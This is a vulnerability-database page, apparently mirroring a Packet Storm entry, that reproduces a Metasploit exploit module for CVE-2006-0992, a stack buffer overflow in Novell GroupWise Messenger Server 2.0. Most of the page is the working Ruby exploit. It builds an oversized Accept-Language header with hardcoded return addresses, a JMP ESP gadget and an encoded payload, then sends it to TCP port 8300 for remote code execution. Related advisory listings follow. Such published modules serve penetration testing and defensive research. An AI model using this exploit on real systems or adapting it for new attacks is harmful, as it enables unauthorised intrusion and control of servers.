Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH D MoorePACKETSTORM:83166
HistoryNov 26, 2009 - 12:00 a.m.

Novell Messenger Server 2.0 Accept-Language Overflow

2009-11-2600:00:00
H D Moore
packetstormsecurity.com
22

0.314 Low

EPSS

Percentile

96.5%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',  
'Description' => %q{  
This module exploits a stack overflow in Novell GroupWise  
Messenger Server v2.0. This flaw is triggered by any HTTP  
request with an Accept-Language header greater than 16 bytes.  
To overwrite the return address on the stack, we must first  
pass a memcpy() operation that uses pointers we supply. Due to the  
large list of restricted characters and the limitations of the current  
encoder modules, very few payloads are usable.   
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2006-0992'],  
['OSVDB', '24617'],  
['BID', '17503'],  
],  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 500,   
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }],  
],  
'DisclosureDate' => 'Apr 13 2006'))  
  
register_options( [ Opt::RPORT(8300) ], self.class )  
end  
  
def exploit  
connect  
  
lang = rand_text_alphanumeric(1900)  
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC  
lang[272, 4] = [target['Rets'][1]].pack('V') # DST  
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP  
lang[268, 2] = "\xeb\x06"  
lang[276, payload.encoded.length] = payload.encoded  
  
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"  
  
print_status("Trying target address 0x%.8x..." % target['Rets'][0])  
sock.put(res)  
sock.close  
  
handler  
disconnect  
end  
  
end  
`

Related

checkpoint_advisories 1
saint 4
zdi 1
nessus 1
canvas 1
prion 1
cve 2
checkpoint_advisories
checkpoint_advisories
Novell GroupWise Messenger Accept-Language Header Buffer Overflow (CVE-2006-0992)
2009-10-27 00:00:00
saint
saint
Novell GroupWise Messenger Accept-Language buffer overflow
2006-04-20 00:00:00
Novell GroupWise Messenger Accept-Language buffer overflow
2006-04-20 00:00:00
Novell GroupWise Messenger Accept-Language buffer overflow
2006-04-20 00:00:00
zdi
zdi
Novell GroupWise Messenger Accept-Language Buffer Overflow Vulnerability
2006-04-13 00:00:00
nessus
nessus
Novell GroupWise Messenger Accept Language Remote Overflow
2006-04-19 00:00:00
canvas
canvas
Immunity Canvas: GROUPWISE_MESSENGER
2006-04-14 10:02:00
prion
prion
Stack overflow
2006-04-14 10:02:00
cve
cve
CVE-2006-0992
2006-04-14 10:02:00
CVE-2006-0092
2006-01-05 11:03:00

0.314 Low

EPSS

Percentile

96.5%

JSON
Related for PACKETSTORM:83166
checkpoint_advisories1saint4zdi1nessus1canvas1prion1cve2